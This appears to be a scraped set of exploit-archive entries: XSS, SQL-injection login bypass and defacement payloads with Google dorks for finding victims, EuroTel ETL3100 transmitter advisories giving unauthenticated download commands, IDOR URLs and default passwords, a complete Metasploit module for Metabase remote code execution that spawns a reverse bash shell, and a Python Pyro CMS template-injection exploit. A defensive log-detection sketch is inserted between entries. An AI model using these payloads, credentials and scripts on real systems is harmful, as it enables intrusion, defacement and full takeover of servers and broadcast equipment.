<pre><code>====================================================================================================================================<br />| # Title : Discussion on Kontackt - The Exclusive PHP Social Network Platform (v1.18) XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : https://codecanyon.net/item/social-plus-ultimate-social-network-platform/21391853 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Register a new user at https://127.0.0.1/ .<br /><br />[+] Use payload in search box : <script>alert(/indoushka/);</script><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Digisha CMS V1.2.7 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3 (32-bit) |<br />| # Vendor : http://www.digisha.com/ |<br />| # Dork : Powered by Digisha |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use payload : user & pass = 1' or 1=1 -- -<br /><br />[+] http://127.0.0.1/ksminesindiacom/admin/welcome.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : DigaSell - Digital store PHP Script V1.0.0 Blind SQL Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0 (64-bit) |<br />| # Vendor : https://codecanyon.net/item/digasell-digital-store-php-script/23580305?s_rank=2 |<br />| # Dork : "Copyright © DigaSell All Rights Reserved." |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use Payload : http://127.0.0.1/codsemcom/digasell/search?term=1 <==== inject here<br /><br />[+] Panel : https://127.0.0.1/codsemcom/digasell/admin/dashboard<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>==========================================================================================<br />| # Title : Doma CMS v1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : http://www.matstroeng.se/doma/ |<br />| # Dork : Digital Orienteering Map Archive, version 1.0 | Log in |<br />==========================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use payload : %22onmouseover%3d'prompt(1373)'bad%3d%22<br /><br />[+] http://127.0.0.1/doma/users.php/%22onmouseover%3d'prompt(903296)'bad%3d%22<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Desenvolvido C3iM CMS v2.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : http://c3im.pt/ |<br />| # Dork : intext:''Desenvolvido C3iM'' site:pt |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use Payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /><br />[+] http://127.0.0.1/conteudo.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code><br />EuroTel ETL3100 Transmitter Unauthenticated Config/Log Download Vulnerability<br /><br />Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L<br />Product web page: https://www.eurotel.it | https://www.siel.fm<br />Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)<br /> v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)<br /><br /><br />Summary: RF Technology For Television Broadcasting Applications.<br />The Series ETL3100 Radio Transmitter provides all the necessary<br />features defined by the FM and DAB standards. Two bands are provided<br />to easily comply with the analog and digital DAB standards. The Series<br />ETL3100 Television Transmitter provides all the necessary features<br />defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as<br />well as the analog TV standards. Three bands are provided to easily<br />comply with all standard channels, and switch softly from analog-TV<br />'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.<br /><br />Desc: The TV and FM transmitter suffers from an unauthenticated<br />configuration and log download vulnerability. This enables an<br />attacker to disclose sensitive information and assists in<br />authentication bypass, privilege escalation and full system access.<br /><br />Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)<br /> lighttpd/1.4.26<br /> PHP/5.4.3<br /> Xilinx Virtex Machine<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5784<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5784.php<br /><br /><br />29.04.2023<br /><br />--<br /><br /><br />$ curl http://192.168.2.166/cfg_download.php -o config.tgz<br />$ curl http://192.168.2.166/exciter/log_download.php -o log.tar.gz<br /></code></pre>
<pre><code><br />EuroTel ETL3100 Transmitter Authorization Bypass (IDOR)<br /><br />Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L<br />Product web page: https://www.eurotel.it | https://www.siel.fm<br />Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)<br /> v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)<br /><br /><br />Summary: RF Technology For Television Broadcasting Applications.<br />The Series ETL3100 Radio Transmitter provides all the necessary<br />features defined by the FM and DAB standards. Two bands are provided<br />to easily comply with the analog and digital DAB standards. The Series<br />ETL3100 Television Transmitter provides all the necessary features<br />defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as<br />well as the analog TV standards. Three bands are provided to easily<br />comply with all standard channels, and switch softly from analog-TV<br />'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.<br /><br />Desc: The application is vulnerable to insecure direct object references,<br />which occur when the application provides direct access to objects based<br />on user-supplied input. As a result of this vulnerability attackers can<br />bypass authorization, access hidden resources on the system and<br />execute privileged functionality.<br /><br />Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)<br /> lighttpd/1.4.26<br /> PHP/5.4.3<br /> Xilinx Virtex Machine<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5783<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5783.php<br /><br /><br />29.04.2023<br /><br />--<br /><br /><br />See URL:<br /><br />TARGET/exciter.php?page=0<br />TARGET/exciter.php?page=1<br />TARGET/exciter.php?page=2<br />...<br />...<br />TARGET/exciter.php?page=29<br />TARGET/exciter.php?page=30<br />TARGET/exciter.php?page=31<br /></code></pre>
<pre><code><br />EuroTel ETL3100 Transmitter Default Credentials<br /><br />Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L<br />Product web page: https://www.eurotel.it | https://www.siel.fm<br />Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)<br /> v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)<br /><br /><br />Summary: RF Technology For Television Broadcasting Applications.<br />The Series ETL3100 Radio Transmitter provides all the necessary<br />features defined by the FM and DAB standards. Two bands are provided<br />to easily comply with the analog and digital DAB standards. The Series<br />ETL3100 Television Transmitter provides all the necessary features<br />defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as<br />well as the analog TV standards. Three bands are provided to easily<br />comply with all standard channels, and switch softly from analog-TV<br />'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.<br /><br />Desc: The TV and FM transmitter uses a weak set of default administrative<br />credentials that can be guessed in remote password attacks to gain full<br />control of the system.<br /><br />Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)<br /> lighttpd/1.4.26<br /> PHP/5.4.3<br /> Xilinx Virtex Machine<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5782<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5782.php<br /><br /><br />29.04.2023<br /><br />--<br /><br /><br />Using Username "user" and Password "etl3100rt1234" the operator will enter the WEB interface in read-only mode.<br />Using Username "operator" and Password "2euro21234" the operator will also be able to modify some parameters in the WEB pages.<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br />  Rank = ExcellentRanking<br /><br />  include Msf::Exploit::Remote::HttpClient<br />  prepend Msf::Exploit::Remote::AutoCheck<br /><br />  def initialize(info = {})<br />    super(<br />      update_info(<br />        info,<br />        'Name' => 'Metabase Setup Token RCE',<br />        'Description' => %q{<br />          Metabase versions before 0.46.6.1 contain a flaw where the secret setup-token<br />          is accessible even after the setup process has been completed. With this token<br />          a user is able to submit the setup functionality to create a new database.<br />          When creating a new database, an H2 database string is created with a TRIGGER<br />          that allows for code execution. We use a sample database for our connection<br />          string to prevent corrupting real databases.<br /><br />          Successfully tested against Metabase 0.46.6.<br />        },<br />        'License' => MSF_LICENSE,<br />        'Author' => [<br />          'h00die', # msf module<br />          'Maxwell Garrett', # original PoC, analysis<br />          'Shubham Shah' # original PoC, analysis<br />        ],<br />        'References' => [<br />          ['URL', 'https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/'],<br />          ['URL', 'https://www.metabase.com/blog/security-advisory'],<br />          ['CVE', '2023-38646']<br />        ],<br />        'Platform' => ['unix'],<br />        'Privileged' => false,<br />        'Arch' => ARCH_CMD,<br />        'DefaultOptions' => {<br />          'PAYLOAD' => 'cmd/unix/reverse_bash'<br />          # for docker payload/cmd/unix/reverse_netcat also works, but no perl/python<br />        },<br />        'Targets' => [<br />          [ 'Automatic Target', {}]<br />        ],<br />        'DisclosureDate' => '2023-07-22',<br />        'DefaultTarget' => 0,<br />        'Notes' => {<br />          'Stability' => [CRASH_SAFE],<br />          'Reliability' => [REPEATABLE_SESSION],<br />          'SideEffects' => [IOC_IN_LOGS]<br />        }<br />      )<br />    )<br />    register_options(<br />      [<br />        Opt::RPORT(3000),<br />        OptString.new('TARGETURI', [ true, 'The URI of the Metabase Application', '/'])<br />      ]<br />    )<br />  end<br /><br />  def get_bootstrap_json_blob_from_html_resp(html)<br />    %r{<script type="application/json" id="_metabaseBootstrap">([^>]+)</script>} =~ html<br />    begin<br />      JSON.parse(Regexp.last_match(1))<br />    rescue JSON::ParserError, TypeError<br />      print_bad('Unable to parse JSON blob')<br />      nil<br />    end<br />  end<br /><br />  def check<br />    res = send_request_cgi(<br />      'uri' => normalize_uri(target_uri.path),<br />      'method' => 'GET'<br />    )<br /><br />    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?<br />    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200<br /><br />    json = get_bootstrap_json_blob_from_html_resp(res.body)<br />    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response, unable to load JSON blob") if json.nil?<br />    version = json.dig('version', 'tag')<br />    return CheckCode::Unknown("#{peer} - Unable to determine version from JSON blob") if version.nil?<br /><br />    # typically v0.46.6<br />    version = version.gsub('v', '')<br /><br />    if Rex::Version.new(version) < Rex::Version.new('0.46.6.1')<br />      return CheckCode::Appears("Version Detected: #{version}")<br />    end<br /><br />    CheckCode::Safe("Version not vulnerable: #{version}")<br />  end<br /><br />  def exploit<br />    res = send_request_cgi(<br />      'uri' => normalize_uri(target_uri.path),<br />      'method' => 'GET'<br />    )<br />    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?<br />    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200<br />    json = get_bootstrap_json_blob_from_html_resp(res.body)<br />    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response, unable to load JSON blob") if json.nil?<br />    setup_token = json['setup-token']<br />    if setup_token.nil?<br />      print_status('Setup token is nil, checking secondary location')<br />      res = send_request_cgi(<br />        'uri' => normalize_uri(target_uri.path, 'api', 'session', 'properties'),<br />        'method' => 'GET'<br />      )<br />      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?<br />      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200<br />      json = res.get_json_document<br />      setup_token = json['setup-token']<br />    end<br /><br />    fail_with(Failure::UnexpectedReply, "#{peer} - Unable to find valid setup-token") if setup_token.nil?<br />    print_good("Found setup token: #{setup_token}")<br /><br />    print_status('Sending exploit (may take a few seconds)')<br />    # our base64ed payload can't have = in it, so we'll pad out with spaces to remove them<br />    b64_pe = ::Base64.strict_encode64(payload.encoded)<br />    equals_count = b64_pe.count('=')<br />    if equals_count > 0<br />      b64_pe = ::Base64.strict_encode64(payload.encoded + ' ' * equals_count)<br />    end<br /><br />    send_request_cgi(<br />      'uri' => normalize_uri(target_uri.path, 'api', 'setup', 'validate'),<br />      'method' => 'POST',<br />      'ctype' => 'application/json',<br />      'data' => {<br />        'token' => setup_token,<br />        'details' =><br />        {<br />          # 'is_on_demand' => false, # without this, the shell takes ~20 sec longer to get<br />          # 'is_full_sync' => false,<br />          # 'is_sample' => false,<br />          # 'cache_ttl' => nil,<br />          # 'refingerprint' => false,<br />          # 'auto_run_queries' => true,<br />          # 'schedules' => {},<br />          'details' =><br />          {<br />            'db' => "zip:/app/metabase.jar!/sample-database.db;TRACE_LEVEL_SYSTEM_OUT=0\\;CREATE TRIGGER #{Rex::Text.rand_text_alpha_upper(6..12)} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,#{b64_pe}}|{base64,-d}|{bash,-i}')\n$$--=x",<br />            'advanced-options' => false,<br />            'ssl' => true<br />          },<br />          'name' => Rex::Text.rand_text_alphanumeric(6..12),<br />          'engine' => 'h2'<br />        }<br />      }.to_json<br />    )<br />  end<br />end<br /></code></pre>
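A defender-side detection sketch covering three of the web-facing issues above: the ETL3100 unauthenticated config/log download (ZSL-2023-5784), the ETL3100 exciter.php?page= enumeration (ZSL-2023-5783), and a POST to Metabase's setup endpoint after setup has completed (CVE-2023-38646). This is an added example, not code from any of these advisories, the Metasploit module or the vendors; it assumes web access logs in Common Log Format (lighttpd's default accesslog is similar) and runs over constructed sample lines using documentation IP ranges.

```python
import re
from collections import defaultdict

# Common Log Format, which lighttpd's default accesslog resembles (assumed).
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
    r'(?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Scripts named in ZSL-2023-5784: served to anyone, so any 200 is a finding.
DOWNLOAD_PATHS = {"/cfg_download.php", "/exciter/log_download.php"}
# Parameter walked in ZSL-2023-5783.
PAGE_RE = re.compile(r"^/exciter\.php\?page=(\d+)$")
PAGE_THRESHOLD = 10   # distinct page ids from one client before flagging
# Endpoint the Metabase module posts the leaked setup-token to (CVE-2023-38646).
METABASE_SETUP = "/api/setup/validate"


def parse(line):
    """Return the CLF fields of one log line, or None if it does not parse."""
    m = CLF.match(line)
    return m.groupdict() if m else None


def detect(lines, metabase_setup_done=True):
    """Return (rule, client_ip, detail) findings for a sequence of log lines.
    On an initialised Metabase instance /api/setup/* should be idle, so with
    metabase_setup_done=True any POST there is treated as setup-token misuse."""
    findings = []
    pages_by_ip = defaultdict(set)
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue                      # malformed line: skip, do not crash
        ip, method, path = rec["ip"], rec["method"], rec["path"]
        if path.split("?", 1)[0] in DOWNLOAD_PATHS and rec["status"] == "200":
            findings.append(("etl3100-unauth-download", ip, path))
        m = PAGE_RE.match(path)
        if m:
            pages_by_ip[ip].add(int(m.group(1)))
        if metabase_setup_done and method == "POST" and path == METABASE_SETUP:
            findings.append(("metabase-setup-token-use", ip, path))
    for ip, pages in sorted(pages_by_ip.items()):
        if len(pages) >= PAGE_THRESHOLD:
            findings.append(("etl3100-page-enumeration", ip,
                             f"{len(pages)} distinct page ids"))
    return findings


def _clf(ip, method, path, status):
    """Build one constructed sample line (timestamp is fictional)."""
    return f'{ip} - - [29/Apr/2023:10:00:00 +0000] "{method} {path} HTTP/1.1" {status} 512'


# Constructed sample traffic: one normal request, the two download scripts,
# a client walking exciter.php?page=0..11, a late setup POST and a junk line.
SAMPLE_LOG = (
    [_clf("192.0.2.10", "GET", "/", 200),
     _clf("198.51.100.7", "GET", "/cfg_download.php", 200),
     _clf("198.51.100.7", "GET", "/exciter/log_download.php", 200)]
    + [_clf("203.0.113.5", "GET", f"/exciter.php?page={n}", 200) for n in range(12)]
    + [_clf("198.51.100.7", "POST", "/api/setup/validate", 200), "not a log line"]
)
```

Run `detect(SAMPLE_LOG)` to see the four findings; on a real deployment feed it the rotated access logs and tune PAGE_THRESHOLD to the number of pages an operator legitimately visits.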
<pre><code># Exploit Title: Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)<br /># Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security<br /># Date: 03/08/2023<br /># Vendor: https://pyrocms.com/<br /># Software Link: https://pyrocms.com/documentation/pyrocms/3.9/getting-started/installation<br /># Vulnerable Version(s): 3.9<br /># CVE: CVE-2023-29689<br /># Notes: You need a user who has access to /admin privilege<br /><br /># Example Usage:<br /># First, run the script: python3 CVE-2023-29689.py<br /># Please follow these steps:<br /># 1. Enter the application URL: http://localhost:8000<br /># 2. Enter the email for authentication: admin@adm.com<br /># 3. Enter the password: Admin@@2023<br /># 4. Enter the command to be executed: id<br /># Result of command execution:<br /># uid=1000(cupcake) gid=1000(cupcake) groups=1000(cupcake)<br /><br />import requests<br />from bs4 import BeautifulSoup<br />from urllib.parse import urljoin<br /><br />def login(session, url, email, password):<br />    login_url = urljoin(url, '/admin/login')<br />    response = session.get(login_url)<br />    soup = BeautifulSoup(response.content, 'html.parser')<br />    token = soup.find('input', {'name': '_token'})['value']<br /><br />    payload = {<br />        '_token': token,<br />        'email': email,<br />        'password': password<br />    }<br /><br />    session.post(login_url, data=payload)<br /><br /># Function to edit role 1 and extract the Description of the Admin user.<br />def edit_role_and_extract_description(session, url, command):<br />    edit_role_url = urljoin(url, '/admin/users/roles/edit/1')<br />    response = session.get(edit_role_url)<br />    soup = BeautifulSoup(response.content, 'html.parser')<br />    token = soup.find('input', {'name': '_token'})['value']<br /><br />    payload = {<br />        '_token': token,<br />        'name_en': 'Admin',<br />        'slug': 'admin',<br />        'description_en': f'{{{{["{command}"]|map("system")|join}}}}',<br />        'action': 'save_exit'<br />    }<br /><br />    session.post(edit_role_url, data=payload)<br /><br />    # Extract the updated Description from role 1.<br />    response = session.get(urljoin(url, '/admin/users/roles'))<br />    soup = BeautifulSoup(response.content, 'html.parser')<br />    description = soup.find('td', {'data-title': 'Description'}).text.strip()<br /><br />    return description<br /><br />def main():<br />    url = input("Enter the application URL: ")<br />    email = input("Enter the email for authentication: ")<br />    password = input("Enter the password: ")<br />    command = input("Enter the command to be executed: ")<br /><br />    with requests.Session() as session:<br />        login(session, url, email, password)<br />        description = edit_role_and_extract_description(session, url, command)<br />        print("\nResult of command execution:")<br />        print(description)<br /><br />if __name__ == "__main__":<br />    main()<br /></code></pre>